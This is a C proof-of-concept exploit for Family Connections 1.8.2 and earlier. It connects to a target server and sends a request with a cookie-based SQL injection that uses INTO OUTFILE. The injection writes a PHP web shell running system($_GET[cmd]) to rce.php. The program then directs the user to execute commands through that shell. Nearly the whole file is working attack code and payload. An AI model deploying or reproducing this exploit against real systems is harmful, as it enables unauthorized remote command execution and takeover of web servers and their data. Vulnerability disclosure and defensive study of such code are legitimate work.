/*

	Family Connections <= 1.8.2 - Remote Command Execution
	
	Proof of Concept - Written by Salvatore "drosophila" Fresta

	The following software will create a file (rce.php) in the
	specified path using Blind SQL Injection bug. To exec remote
	commands, you must open the file using a browser.
	
*/	

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

	int fd;
	struct sockaddr_in sock;
	struct hostent *host;
	
	memset(&sock, 0, sizeof(sock));
	
	if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
	
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	
	if(!(host=gethostbyname(server))) return -1;
	
	sock.sin_addr = *((struct in_addr *)host->h_addr);
	
	if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
	
	return fd;
   
}

int socket_send(int socket, char *buffer, size_t size) {
	
	if(socket < 0) return -1;

	return write(socket, buffer, size) < 0 ? -1 : 0;
	
}

void usage(char *bn) {

	printf("\n\nFamily Connections <= 1.8.2 - Remote Command Execution\n"
			"Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n"
			"usage: %s <server> <path> <fs path>\n"
			"example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn);	

}

int main(int argc, char *argv[]) {
	
	int sd;
	char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo \"</pre><br><br>\"%3b?>'",
		*buffer; 
	
	if(argc < 4) {
		usage(argv[0]);
		return -1;
	}
	
	if(!(buffer = (char *)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]), sizeof(char)))) {
		perror("calloc");
		return -1;
	}
	
	sprintf(buffer,	"GET %shome.php HTTP/1.1\r\n"
					"Host: %s\r\n"
					"Cookie: fcms_login_id=-1 UNION ALL SELECT %s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '%srce.php'#\r\n\r\n",
					argv[2], argv[1], code, argv[3]);
					
	printf("\n[*] Connecting...");
	
	if((sd = socket_connect(argv[1], 80)) < 0) {
		perror("[-] Connection failed");
		free(buffer);
		return -1;
	}
	
	printf("\n[+] Connected"
			"\n[*] Sending...");
	
	if(socket_send(sd, buffer, strlen(buffer)) < 0) {
		perror("[-] Sending failed");
		free(buffer);
		return -1;
	}
	
	printf("\n[+] Sent\n\n"
			"Open your browser and  try to connect to http://%s%srce.php?cmd=ls\n\n", argv[1], argv[2]);
			
	recv(sd, buffer, 1, 0);
	
	close(sd);
	free(buffer);
	
	printf("[+] Connection closed\n\n");
	
	return 0;
	
}